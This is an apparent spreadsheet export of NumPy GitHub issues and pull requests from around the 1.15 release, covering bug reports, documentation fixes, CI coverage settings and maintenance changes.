_x000D_
The problem seems to be in the new code for `gentype_getbuffer`, which creates a PEP 3118 compliant buffer. The old code was:_x000D_
```C_x000D_
int gentype_getbuffer(PyObject *self, Py_buffer *view, int flags)_x000D_
{_x000D_
    Py_ssize_t len;_x000D_
    void *buf;_x000D_
    /* FIXME: XXX: the format is not implemented! -- this needs more work */_x000D_
    len = gentype_getreadbuf(self, 0, &amp;buf);_x000D_
    return PyBuffer_FillInfo(view, self, buf, len, 1, flags);_x000D_
}_x000D_
```_x000D_
so now I need to find what is happening in that code that is not happening in the new code._x000D_
_x000D_
So far I only found where we override an original exception with a new one. ~Now `memoryview(np.datetime64('2016-01-01'))` raises an exception with the same message as `memoryview(np.array(100, 'M8[D]').~_x000D_
_x000D_
Edit: python2 - python3 confusion</t>
  </si>
  <si>
    <t>We should wait to merge this until Nathaniel's has had the chance to read it.</t>
  </si>
  <si>
    <t>NEP: Mark NEP 18 as accepted</t>
  </si>
  <si>
    <t xml:space="preserve">The definition of `_complex_types_map` was repeated in the linalg.py_x000D_
file._x000D_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</si>
  <si>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MAINT: Remove duplicate code.</t>
  </si>
  <si>
    <t>I tried drafting a bit of reference documentation about the `@TYPE@` style generic typing used in NumPy C source since even an experienced C programmer may not have seen that before (it is not standard compliant). I don't think we spell this out anywhere in docs based on a brief discussion with Matti._x000D_
_x000D_
Also, because I may learn something about NumPy source from the criticism of this documentation.</t>
  </si>
  <si>
    <t>DOC: Add ref docs for C generic types.</t>
  </si>
  <si>
    <t>['04 - Documentation', '55 - Needs work']</t>
  </si>
  <si>
    <t>The exception details in the broadcast documentation were old and have since been updated. This commit changes the documentation to reflect the current exception details when a shape mismatch is raised._x000D_
_x000D_
Old:_x000D_
_x000D_
&gt; If these conditions are not met, a `ValueError: frames are not aligned` exception is thrown_x000D_
_x000D_
New:_x000D_
_x000D_
&gt; If these conditions are not met, a `ValueError: operands could not be broadcast together` exception is thrown_x000D_
_x000D_
There was a similar issue in an example in the documentation:_x000D_
_x000D_
Old:_x000D_
_x000D_
```python_x000D_
 &gt;&gt;&gt; x + y_x000D_
 &lt;type 'exceptions.ValueError'&gt;: shape mismatch: objects cannot be broadcast to a single shape_x000D_
```_x000D_
_x000D_
New:_x000D_
_x000D_
```python_x000D_
 &gt;&gt;&gt; x + y_x000D_
 &lt;type 'exceptions.ValueError'&gt;: operands could not be broadcast together with shapes (4,) (5,)_x000D_
```_x000D_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t>
  </si>
  <si>
    <t>DOC: Update broadcasting doc with current exception details</t>
  </si>
  <si>
    <t>An example of a solution that fixes #11631, where a few core devs pointed out that when they develop offline `3` unit tests fail--those unit tests all involve `DataSource`._x000D_
_x000D_
**Good things** about the approach in this PR: concise, uses an actual fake TCP socket implementation that is local only, and seems to work on my laptop with no network connection (no failing tests for full suite or with  `python runtests.py -t "numpy/lib/tests/test__datasource.py"`)_x000D_
_x000D_
**Bad things** about this approach: adds a new testing dependency ([httpretty](https://github.com/gabrielfalcao/HTTPretty)) &amp; that could be enough to shoot it down for something like NumPy; the decorator syntax is yet another thing compounded on top of i.e., the syntactic sugar from `pytest` marks._x000D_
_x000D_
Alternatives: using standard library `mock` to cook something up with `Mock` or `MagicMock`, [pytest `monkeypatch` fixture](https://docs.pytest.org/en/latest/monkeypatch.html) (I think we want to avoid that level of "magic" from pytest though)._x000D_
_x000D_
Notes: `[ci skip]` for now because adding a testing dependency is probably too contentious to justify CI cycles for that at the moment.</t>
  </si>
  <si>
    <t>WIP, TST: NumPy unit tests no longer use a network connection</t>
  </si>
  <si>
    <t>Fixes #7165. Replaces #7170._x000D_
_x000D_
Adds tests and fixes for `unravel_index`, `ravel_multi_index` when the input is an empty list. The strategy in #7170 relied on internal use of `PyArray_DTypeFromObject`. But we can proactively use it with a minimal `int` type (I used `NPY_BOOL` as the most basic type) to determine the dtype of the object while restricting the possibilities to `int` dtypes before calling `PyArray_FromAny`._x000D_
_x000D_
Also added a small refactor of privately used sequence_to_arrays to put output values at the end of the paramter list and use a goto to reduce duplicate code.</t>
  </si>
  <si>
    <t>BUG: Raise when unravel_index, ravel_multi_index are given empty input</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #11669._x000D_
_x000D_
The return value for a void array was not correct when fetching objects._x000D_
_x000D_
Closes #11668._x000D_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</si>
  <si>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regression in void_getitem</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
When creat a array with set the dtype , the array just lost the columns which the dtype is numpy.string_,numpy.str,numpy.str_,numpy.str0 ._x000D_
And when i change 'string_' to '&lt;U1' ,that will work ._x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
&lt;&lt; your code here &gt;&gt;_x000D_
b = np.array([('a',1,2),(3,4,5),(6,7,8)], dtype=([('name','string_'),('age','int8'),('salary','float32')]))_x000D_
a = np.array([('a',1,2),(3,4,5),(6,7,8)], dtype=([('name','&lt;U1'),('age','int8'),('salary','float32')]))_x000D_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_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
1.15.0 3.6.6 |Anaconda custom (64-bit)| (default, Jun 28 2018, 11:27:44) [MSC v.1900 64 bit (AMD64)]_x000D_
</t>
  </si>
  <si>
    <t>BUG : About Data type objects</t>
  </si>
  <si>
    <t>['00 - Bug', '50 - Duplicate', '57 - Close?', 'component: numpy.dtype']</t>
  </si>
  <si>
    <t>We currently have a [PR that is failing CI](https://github.com/numpy/numpy/pull/10915#issuecomment-410828129) because codecov is failing. The codecov patch/ diff failure is due in part to added `setup.py` file lines when `setup.py` itself is obviously not flushed through by test code paths at all, so the patch or diff of the PR relative to master adds ten lines to `setup.py`, none of which are covered, so there's effectively a penalty for that._x000D_
_x000D_
The suggestion here is to use the [codecov.yml path ignore feature](https://docs.codecov.io/docs/ignoring-paths) to ignore all `setup.py` files in all paths of our source. This is an alternative suggested by @eric-wieser in [my initial PR to completely deactivate the patch / diff failure in CI](https://github.com/numpy/numpy/pull/11662). Perhaps this will help probe reviewers to look at coverage changes but prevent wasting their time on `setup.py` lines._x000D_
_x000D_
See also: _x000D_
-  [related issue in Scipy](https://github.com/scipy/scipy/issues/9074)_x000D_
- [related PR to ignore `setup.py` in SciPy](https://github.com/scipy/scipy/pull/9114/files) [they currently propose to ignore some other things as well]_x000D_
_x000D_
There are some differences between the projects of course--we may have an even stronger incentive to include test files themselves since we test a testsuite (and there's a compelling argument linked above that ignoring test files means that you don't catch the accidental addition of a test with the same name).</t>
  </si>
  <si>
    <t>TST: ignore setup.py files for codecov reports</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
the function argsort() returns a wrong indice that would sort an array._x000D_
for example:_x000D_
&gt;&gt;&gt;from numpy import *_x000D_
&gt;&gt;&gt; a=array([4,2,3,1])_x000D_
&gt;&gt;&gt; argsort(a)_x000D_
array([3, 1, 2, 0], dtype=int64)_x000D_
### so this is right, it returned the sorted index. but the follow example is wrong:_x000D_
&gt;&gt;&gt; a=array([4,2,3])_x000D_
&gt;&gt;&gt; argsort(a)_x000D_
array([1, 2, 0], dtype=int64)_x000D_
### the right index should be array([2,0,1]),and the follow example is also wrong:_x000D_
_x000D_
&gt;&gt;&gt; a=array([5,1,4,3,2])_x000D_
&gt;&gt;&gt; argsort(a)_x000D_
array([1, 4, 3, 2, 0], dtype=int64)_x000D_
### the right index should be array([4,0,3,2,1]),and the follow example is also wrong:_x000D_
&gt;&gt;&gt; a=array([7,1,5,2,4,6,3])_x000D_
&gt;&gt;&gt; argsort(a)_x000D_
array([1, 3, 6, 4, 2, 5, 0], dtype=int64)_x000D_
### the right index should be array([6,0,4,1,3,5,2]),so I find a error rule that function argsort() will display the wrong index when an array that starts with a maximum and has an odd number of elements._x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
&gt;&gt;&gt;from numpy import *_x000D_
&gt;&gt;&gt; a=array([4,2,3,1])_x000D_
&gt;&gt;&gt; argsort(a)_x000D_
array([3, 1, 2, 0], dtype=int64)_x000D_
### so this is right, it returned the sorted index. but the follow example is wrong:_x000D_
&gt;&gt;&gt; a=array([4,2,3])_x000D_
&gt;&gt;&gt; argsort(a)_x000D_
array([1, 2, 0], dtype=int64)_x000D_
### the right index should be array([2,0,1]),and the follow example is also wrong:_x000D_
_x000D_
&gt;&gt;&gt; a=array([5,1,4,3,2])_x000D_
&gt;&gt;&gt; argsort(a)_x000D_
array([1, 4, 3, 2, 0], dtype=int64)_x000D_
### the right index should be array([4,0,3,2,1]),and the follow example is also wrong:_x000D_
&gt;&gt;&gt; a=array([7,1,5,2,4,6,3])_x000D_
&gt;&gt;&gt; argsort(a)_x000D_
array([1, 3, 6, 4, 2, 5, 0], dtype=int64)_x000D_
```_x000D_
_x000D_
&lt;!-- Remove these sections for a feature request --&gt;_x000D_
_x000D_
### Error message:_x000D_
_x000D_
&lt;!-- If you are reporting a segfault please include a GDB traceback, which you_x000D_
can generate by following_x000D_
https://github.com/numpy/numpy/blob/master/doc/source/dev/development_environment.rst#debugging --&gt;_x000D_
_x000D_
&lt;!-- Full error message, if any (starting from line Traceback: ...) --&gt;_x000D_
_x000D_
### Numpy/Python version information:_x000D_
Numpy 1.13.3/Python 3.5.2_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
1.13.3 3.5.2 (v3.5.2:4def2a2901a5, Jun 25 2016, 22:18:55) [MSC v.1900 64 bit (AMD64)]_x000D_
</t>
  </si>
  <si>
    <t>numpy.argsort() bug</t>
  </si>
  <si>
    <t>Just a little "See also" addition of geomspace in the linspace docstring.</t>
  </si>
  <si>
    <t>DOC: Add geomspace to "See also" of linspace</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
I have a subclass of `ndarray` that supports ufunc-based subclassing by using `__array_finalize__`. But functions like `numpy.concatenate` will not preserve the type. Is/Will there be some ways for subclassing with non-universal functions._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
class NDarray(numpy.ndarray):_x000D_
    def __new__(cls):_x000D_
        # ..._x000D_
    def __array_finalize__(self, obj: typing.Any) -&gt; None:_x000D_
        # ..._x000D_
_x000D_
arr = NDarray([1,2,3])_x000D_
arr = np.add(arr, arr)_x000D_
type(arr)  # -&gt; NDarray_x000D_
arr = np.concatenate([arr, arr])_x000D_
type(arr)  # -&gt; np.ndarray_x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
1.14.3 3.6.5 (default, Jul 16 2018, 23:21:05) _x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Subclassing support for non-universal functions</t>
  </si>
  <si>
    <t>While digging in this code for something else I noticed that we can avoid creating an `nditer` in all cases. Might speed up array indexing `a[np.array((1, 2, 3)), ...]` a bit. The iterator will still be used when adding a dimension `a[np.array((1, 2, 3)), None, ...]`</t>
  </si>
  <si>
    <t>MAINT: trivially refactor mapped indexing</t>
  </si>
  <si>
    <t xml:space="preserve">The return value for a void array was not correct when fetching objects._x000D_
_x000D_
Closes #11668._x000D_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</si>
  <si>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regression in `void_getitem`</t>
  </si>
  <si>
    <t xml:space="preserve">I don't know whether this is Numpy bug or Pandas bug. Since upgrading to 1.15.0, I'm getting garbage in my pandas.Series when I construct it using an ndarray. This worked fine in Numpy 1.14.5._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
```python_x000D_
import numpy_x000D_
import pandas_x000D_
_x000D_
a = numpy.array(['abcd'], "V4")_x000D_
#print a_x000D_
s = pandas.Series(a).apply(lambda x: str(x))_x000D_
print s_x000D_
```_x000D_
_x000D_
### Error message:_x000D_
_x000D_
With Numpy 1.14.5, it prints:_x000D_
```_x000D_
0    abcd_x000D_
dtype: object_x000D_
```_x000D_
_x000D_
With Numpy 1.15.0, it prints:_x000D_
```_x000D_
0    �7�5_x000D_
dtype: object_x000D_
```_x000D_
_x000D_
However, if you uncomment the ```print a```, then it will print:_x000D_
```_x000D_
[b'\x61\x62\x63\x64']_x000D_
0    abcd_x000D_
dtype: object_x000D_
```_x000D_
_x000D_
Note that the original "V4" ndarray is produced by another library. Ideally, they should probably be producing an "a4" ndarray. But that's another matter._x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
Python 2.7.5_x000D_
Numpy 1.15.0_x000D_
Pandas 0.23.3_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Strange problem when creating a pandas.Series from void ndarray since 1.15.0</t>
  </si>
  <si>
    <t>Fixes #2705. _x000D_
_x000D_
I tried to find a balance between fixing all possible edge cases and keeping the code simple. The documentation for [broadcast_arrays](http://www.numpy.org/devdocs/reference/generated/numpy.broadcast_arrays.html) already warns against writing to these, this PR attempts to detect a pending, perhaps unintentional write in a func operation and raises a `ValueError`</t>
  </si>
  <si>
    <t>BUG: prevent ufunc output to an already-broadcasted array</t>
  </si>
  <si>
    <t>I got the error message below when I tried to run the code that follows:_x000D_
_x000D_
```python_x000D_
import json_x000D_
import keras_x000D_
import keras.preprocessing.text as kpt_x000D_
from keras.preprocessing.text import Tokenizer_x000D_
import numpy as np_x000D_
_x000D_
# extract data from a csv_x000D_
# notice the cool options to skip lines at the beginning_x000D_
# and to only take data from certain columns_x000D_
training = np.genfromtxt('train_tweet_data.csv', delimiter=',', skip_header=1, usecols=(1, 2), dtype=None)_x000D_
_x000D_
# create our training data from the tweets_x000D_
train_x = [x[1] for x in training]_x000D_
# index all the sentiment labels_x000D_
train_y = np.asarray([x[0] for x in training])_x000D_
_x000D_
# only work with the 3000 most popular words found in our dataset_x000D_
max_words = 3000_x000D_
_x000D_
# create a new Tokenizer_x000D_
tokenizer = Tokenizer(num_words=max_words)_x000D_
# feed our tweets to the Tokenizer_x000D_
tokenizer.fit_on_texts(train_x)  #error start here_x000D_
```_x000D_
_x000D_
Error message_x000D_
```_x000D_
---------------------------------------------------------------------------_x000D_
AttributeError                            Traceback (most recent call last)_x000D_
&lt;ipython-input-2-91ccf4872470&gt; in &lt;module&gt;()_x000D_
      5 tokenizer = Tokenizer(num_words=max_words)_x000D_
      6 # feed our tweets to the Tokenizer_x000D_
----&gt; 7 tokenizer.fit_on_texts(train_x)_x000D_
      8 _x000D_
      9 # Tokenizers come with a convenient list of words and IDs_x000D_
_x000D_
/usr/local/lib/python2.7/site-packages/keras_preprocessing/text.pyc in fit_on_texts(self, texts)_x000D_
    216                                             self.filters,_x000D_
    217                                             self.lower,_x000D_
--&gt; 218                                             self.split)_x000D_
    219             for w in seq:_x000D_
    220                 if w in self.word_counts:_x000D_
_x000D_
/usr/local/lib/python2.7/site-packages/keras_preprocessing/text.pyc in text_to_word_sequence(text, filters, lower, split)_x000D_
     40     """_x000D_
     41     if lower:_x000D_
---&gt; 42         text = text.lower()_x000D_
     43 _x000D_
     44     if sys.version_info &lt; (3,):_x000D_
_x000D_
AttributeError: 'numpy.int64' object has no attribute 'lower'_x000D_
```_x000D_
_x000D_
I'm using numpy 1.13.1. If using higher version than this will produce more error messages. Please advice. Thank you.</t>
  </si>
  <si>
    <t>AttributeError: 'numpy.int64' object has no attribute 'lower'</t>
  </si>
  <si>
    <t xml:space="preserve">Adds a `CYTHON_SMALL_CODE` macro to building our only cython module, `mtrand`_x000D_
_x000D_
Relates to #11664, fixes it for 1.15 branch. Assumes cython will fix it and we will update cython accordingly for 1.16._x000D_
_x000D_
Also starts the release note for 1.15.1_x000D_
</t>
  </si>
  <si>
    <t>BUG: cython sometimes emits invalid gcc attribute</t>
  </si>
  <si>
    <t xml:space="preserve">Downloading numpy 0.14.3 or greater from pypi was broken on OpenBSD/macppc._x000D_
_x000D_
We traced the breakage to the upgrade from Cython 0.26 used in numpy 0.14.2 to Cython 0.28 used in the numpy 0.14.3 package._x000D_
_x000D_
The reason was traced to use of _attribute__((optimize("Os"))) in recent versions of Cython. On OpenBSD we’ve disabled use of this gcc atttibute as the gcc folks have documented that this attribute is “not suitable in production code”._x000D_
_x000D_
Reporting this issue here in case numpy developers want to review._x000D_
_x000D_
Here’s a link to the OpenBSD patch we applied to numpy to disable this Cython feature. Our diff includes links to a few relevant Cython bug reports that may be interesting to review as well:_x000D_
_x000D_
https://github.com/openbsd/ports/commit/4bcdc694962990039740a88abbf6ec7d18fb4027_x000D_
</t>
  </si>
  <si>
    <t>numpy &gt; 0.14.2 broke on OpenBSD/macppc due to use of Cython &gt; 0.27.3</t>
  </si>
  <si>
    <t>It seems that codecov is causing CI failures when PR patch coverage diffs are lower than the total coverage for the project ([example PR](https://github.com/numpy/numpy/pull/10915) from @mattip that is otherwise passing tests)._x000D_
_x000D_
The settings that affect this are not well-documented but this PR tries to mimic some additional settings from [SciPy yml](https://github.com/scipy/scipy/blob/master/codecov.yml) that appear to be related (in particular: `patch: false`)._x000D_
_x000D_
I don't *think* we want CI to fail in this scenario, but if we do I can close this. Note that as usual the changes to behavior would only happen once devs rebase their branches to pull in the new yml file; we could require codecov to use the yml file on master branch only, but then PRs that adjust .codecov.yml might be harder to evaluate until merged.</t>
  </si>
  <si>
    <t>WIP, TST: prevent patch-driven codecov CI failures</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #11595._x000D_
_x000D_
Fixes #11589_x000D_
_x000D_
PR #11043 added a check for Nan in the minimum, maximum loops._x000D_
_x000D_
Scalars and float16 take a different code path through maximum, minimum that was not checked. Tests added that failed before and pass after the fix._x000D_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</si>
  <si>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Warn on Nan in minimum,maximum for scalars</t>
  </si>
  <si>
    <t>['00 - Bug', '08 - Backport', 'component: numpy.ufunc']</t>
  </si>
  <si>
    <t>Extends PR #11595 to `float16`, and complex types, which now set invalid float status when encountering a Nan in `np.maximum`, `np.minimum`</t>
  </si>
  <si>
    <t>ENH: Add Nan warnings for maximum, minimum on more dtypes</t>
  </si>
  <si>
    <t>['01 - Enhancement', 'component: numpy.core', 'component: numpy.ufunc']</t>
  </si>
  <si>
    <t>This fixes #11636_x000D_
_x000D_
Also adds xfailing tests for related issues (#10533, #11651)_x000D_
_x000D_
---_x000D_
_x000D_
This bug has been around forever, but it surfaced in new places due to some of my cleanup elsewhere, so I think is worth of a backport._x000D_
_x000D_
As usual, trivially backportable using the web ui</t>
  </si>
  <si>
    <t>BUG: Ensure singleton dimensions are not dropped when converting ctype arrays to dtypes</t>
  </si>
  <si>
    <t xml:space="preserve">### Reproducing code example:_x000D_
_x000D_
Using `numpy==1.15.0` and Python 3.6_x000D_
_x000D_
```_x000D_
import pickle_x000D_
import numpy as np_x000D_
pickle.dumps(np.datetime64('2016-01-01T00:00:00.000000000'))_x000D_
```_x000D_
_x000D_
leads to `BufferError: could not get scalar buffer information`_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
```_x000D_
&gt;&gt;&gt; import sys, numpy; print(numpy.__version__, sys.version)_x000D_
1.15.0 3.6.4 | packaged by conda-forge | (default, Dec 23 2017, 16:54:01)_x000D_
[GCC 4.2.1 Compatible Apple LLVM 6.1.0 (clang-602.0.53)]_x000D_
```_x000D_
</t>
  </si>
  <si>
    <t>Cannot pickle numpy.datetime64 scalars in Python 3.6</t>
  </si>
  <si>
    <t>See https://github.com/cython/cython/issues/2498#issuecomment-409455046. If by the 1.16.0 release there is still no support in Cython for the non-deprecated C API, then we should add a way to silence the build warnings. A simple environment variable that, if set, silences the build warning would be easy to implement.</t>
  </si>
  <si>
    <t>add method to silence old API deprecation build warnings</t>
  </si>
  <si>
    <t>['03 - Maintenance', '07 - Deprecation', 'component: numpy.core']</t>
  </si>
  <si>
    <t xml:space="preserve">Related to #10528, but for `np.dtype` instead of `np.array`_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
import ctypes_x000D_
class PackedStructure(ctypes.Structure):_x000D_
    _pack_ = 1_x000D_
    _fields_ = [_x000D_
        ('a', ctypes.c_uint8),_x000D_
        ('b', ctypes.c_uint16)_x000D_
    ]_x000D_
actual = np.dtype(PackedStructure)_x000D_
expected = np.dtype([_x000D_
    ('a', np.uint8),_x000D_
    ('b', np.uint16)_x000D_
])_x000D_
```_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>BUG: Cannot convert ctypes structure with _pack_ into a numpy dtype</t>
  </si>
  <si>
    <t xml:space="preserve">When `numpy.array()` is passed a nested list of differing sublengths, it should raise a `ValueError`. Instead, it currently creates a 1d array of objects. It seems to me that the current behaviour would never be useful, and can only serve to confuse. There are two possible reasons a user would pass such an argument to `numpy.array()`:_x000D_
_x000D_
1. If one _wanted_ to make an array of lists, then relying on current behaviour would be very dangerous, as the desired effect only happens when the sublists are of different lengths. If something were to change in the code and the sublist lengths happened to coincide, then the result would suddenly be a 2d array rather than the 1d array they had before, which could easily lead to cryptic errors elsewhere in the code. Rather, the safest way to create a numpy array of lists, if that is the desired effect, would be to create an empty object array and then set the values individually, as this would work regardless of the lengths of the sublists._x000D_
_x000D_
2. In the vast majority of use-cases, though, a 2d array is far preferable to a 1d array of lists. Most of the time, when `numpy.array()` is passed a nested list of differing sublengths, it is a _mistake_. Returning a 1d array of lists in that case is highly undesirable, as it does not raise an error that the user can see. Instead, it silently passes something completely different from what the user was expecting, to raise cryptic errors elsewhere in the code._x000D_
_x000D_
Therefore, the expected behaviour of `numpy.array()` when passed a nested list of differing sublengths would be to raise a `ValueError`. This simultaneously prevents users of the first use-case from using dangerous instantiation methods that will likely break if the sublist lengths just happen to coincide, and gives users of the second use-case a coherent error message to highlight their mistake._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
~~~~python_x000D_
import numpy as np_x000D_
a = np.array([[0,0], [0,0]]) # makes sense_x000D_
print(a) # creates float64 ndarray of shape (2, 2)_x000D_
b = np.array([[0,0], [0,0,0]]) # almost certainly a mistake_x000D_
print(b) # creates object array of shape (2,)_x000D_
~~~~_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
`1.14.3 3.6.5 |Anaconda, Inc.| (default, Mar 29 2018, 13:32:41) [MSC v.1900 64 bit (AMD64)]`_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Creating numpy array of nested list of differing sublengths should raise ValueError</t>
  </si>
  <si>
    <t xml:space="preserve">Sorry for a rather incomplete bug report, but isolating this to a code fragment may not be possible. I am happy to provide more help in diagnosis, though. _x000D_
_x000D_
I have an automated Jenkins build procedure that uses f2py to generate .so files from a series of Fortran files. With anaconda packages _x000D_
_x000D_
    numpy-1.14.5               |   py27h1b885b7_4          35 KB_x000D_
    numpy-base-1.14.5          |   py27hdbf6ddf_4         4.1 MB_x000D_
_x000D_
running on VM with Red Hat Enterprise Linux Server release 7.5 (Maipo), my build runs fine. If I update to _x000D_
_x000D_
    numpy                     1.15.0           py27h1b885b7_0  _x000D_
    numpy-base                1.15.0           py27h3dfced4_0  _x000D_
_x000D_
The build hangs in this command:_x000D_
_x000D_
```_x000D_
jenkins  23248 23087  0 12:10 ?        00:00:02 /var/lib/jenkins/jobs/Py2_L64_Build-copy/workspace/conda27/bin/python /var/lib/jenkins/jobs/Py2_L64_Build-copy/workspace/conda27/bin/f2py -c fellipse.for -m fellipse libspsubs.a libtexturesubs.a libDIFFaXsubs.a libpowsubs.a --fcompiler=gnu95 --f77exec=gfortran --f77flags=-fno-range-check -m64_x000D_
```_x000D_
with this following output:_x000D_
_x000D_
```_x000D_
building 'fellipse' extension_x000D_
compiling C sources_x000D_
C compiler: gcc -pthread -B /var/lib/jenkins/jobs/Py2_L64_Build-copy/workspace/conda27/compiler_compat -Wl,--sysroot=/ -fno-strict-aliasing -g -O2 -DNDEBUG -g -fwrapv -O3 -Wall -Wstrict-prototypes -fPIC_x000D_
_x000D_
creating /tmp/tmpnkv0Hd/tmp_x000D_
creating /tmp/tmpnkv0Hd/tmp/tmpnkv0Hd_x000D_
creating /tmp/tmpnkv0Hd/tmp/tmpnkv0Hd/src.linux-x86_64-2.7_x000D_
compile options: '-I/tmp/tmpnkv0Hd/src.linux-x86_64-2.7 -I/var/lib/jenkins/jobs/Py2_L64_Build-copy/workspace/conda27/lib/python2.7/site-packages/numpy/core/include -I/var/lib/jenkins/jobs/Py2_L64_Build-copy/workspace/conda27/include/python2.7 -c'_x000D_
gcc: /tmp/tmpnkv0Hd/src.linux-x86_64-2.7/fellipsemodule.c_x000D_
gcc: /tmp/tmpnkv0Hd/src.linux-x86_64-2.7/fortranobject.c_x000D_
```_x000D_
_x000D_
It apparently completes the gcc step and then hangs. It is not in an infinite loop, since the CPU time is not increasing. This is problem reproducible and restoring the previous numpy version addresses it. _x000D_
</t>
  </si>
  <si>
    <t>f2py build hangs after running gcc w/1.15.0</t>
  </si>
  <si>
    <t>['06 - Regression', 'component: numpy.f2py']</t>
  </si>
  <si>
    <t xml:space="preserve">Fixes #11639, relates to https://bugs.python.org/issue1764286_x000D_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</si>
  <si>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 doc source links to unwrap decorators</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #11634._x000D_
_x000D_
This pull requests adds back filters for the Cython-related_x000D_
`RuntimeWarning: numpy.dtype size changed, may indicate binary incompatibility. Expected 96, got 88`_x000D_
</t>
  </si>
  <si>
    <t>MAINT: Filter Cython warnings in ``__init__.py``</t>
  </si>
  <si>
    <t>['03 - Maintenance', '06 - Regression', '08 - Backport']</t>
  </si>
  <si>
    <t>A rather trivial PR, this simply inserts the up to date link to the Spyder IDE's new website in the Development Environment documentation, where Spyder is mentioned. It also cleans up a few trailing spaces present in the file while its at it, although I made it a separate commit so I can easily drop/revert it if not desired. Thanks!_x000D_
_x000D_
Part of the broader effort described in spyder-ide/spyder-docs#39 to update out of date links to Spyder across the web.</t>
  </si>
  <si>
    <t>DOC: Insert up to date link to Spyder website in Dev Env doc where Spyder is mentioned</t>
  </si>
  <si>
    <t xml:space="preserve">* Allow specifying a single comma-separated unicode string of names in np.rec.fromarrays_x000D_
* Allow sorting on unicode field names._x000D_
_x000D_
This addresses some of the problems raised in issue #2407_x000D_
_x000D_
&lt;!-- Please be sure you are following the instructions in the dev guidelines_x000D_
http://www.numpy.org/devdocs/dev/gitwash/development_workflow.html_x000D_
--&gt;_x000D_
_x000D_
&lt;!-- We'd appreciate it if your commit message is properly formatted_x000D_
http://www.numpy.org/devdocs/dev/gitwash/development_workflow.html#writing-the-commit-message_x000D_
--&gt;_x000D_
</t>
  </si>
  <si>
    <t>BUG: Fixes for unicode field names in Python 2</t>
  </si>
  <si>
    <t>The source link in [the documentation of the new `printoptions` context manager](https://docs.scipy.org/doc/numpy/reference/generated/numpy.printoptions.html?highlight=printoption) has the wrong link target: it goes to the invalid_x000D_
```_x000D_
http://github.com/anaconda3/lib/python3.6/contextlib.py#L281-L311_x000D_
```_x000D_
Seems like an issue with the link auto-generation machinery, maybe even with other decorated functions?</t>
  </si>
  <si>
    <t>Source link in doc of `printoptions` goes to contextlib</t>
  </si>
  <si>
    <t>This allows np.ma.expand_dims to be removed</t>
  </si>
  <si>
    <t>ENH: Make expand_dims work on subclasses</t>
  </si>
  <si>
    <t>['01 - Enhancement', 'component: numpy.lib', 'component: numpy.ma']</t>
  </si>
  <si>
    <t>…</t>
  </si>
  <si>
    <t>ENH: np.angle: Remove unnecessary multiplication, and allow subclasses to pass through</t>
  </si>
  <si>
    <t>It appears that, when a 2 dimensional array's first index has a length of 1, round-tripping the array through `np.ctypeslib.as_ctypes` and `np.ctypeslib.as_array` loses the shape of the array._x000D_
_x000D_
Here is a short repro:_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
arr = np.array([[1, 2]])_x000D_
c_arr = np.ctypeslib.as_ctypes(arr)_x000D_
back = np.ctypeslib.as_array(c_arr)_x000D_
np.testing.assert_equal(arr, back)_x000D_
_x000D_
# In numpy 1.15:_x000D_
# E       AssertionError: _x000D_
# E       Arrays are not equal_x000D_
# E       _x000D_
# E       (shapes (1, 2), (2,) mismatch)_x000D_
# E        x: array([[1, 2]])_x000D_
# E        y: array([1, 2])_x000D_
```_x000D_
_x000D_
Note that this did not occur in numpy v1.14. Another example of an array that doesn't round trip correctly is `[[1], [2]]`. However, `[[1, 2], [3, 4]]` does round trip correctly._x000D_
_x000D_
Note that a possibly-relevant warning which I do not understand occurs when executing the repro code:_x000D_
_x000D_
```_x000D_
RuntimeWarning: Item size computed from the PEP 3118 buffer format string does not match the actual item size._x000D_
```</t>
  </si>
  <si>
    <t>Array shape is lost during as_ctypes/as_array round trip in 1.15</t>
  </si>
  <si>
    <t xml:space="preserve">I am using numpy in python 3.6.5 where the code_x000D_
```_x000D_
&gt;&gt;&gt; import numpy as np_x000D_
&gt;&gt;&gt; M = np.matrix([[2,1],[1,1]], dtype=object)_x000D_
&gt;&gt;&gt; M**3_x000D_
```_x000D_
Runs fine in numpy 1.14.x but raises a _x000D_
`TypeError: Object arrays are not currently supported`_x000D_
in numpy 1.15.0. I looked in the 1.15.0 release notes but couldn't see anything about matrix multiplication / powers being depreciated for objects. Is there a way around this? Currently I need to make matrices of python integers in order to be able to support doing large powers without overflow._x000D_
</t>
  </si>
  <si>
    <t>Can no longer take powers of matrices with dtype object</t>
  </si>
  <si>
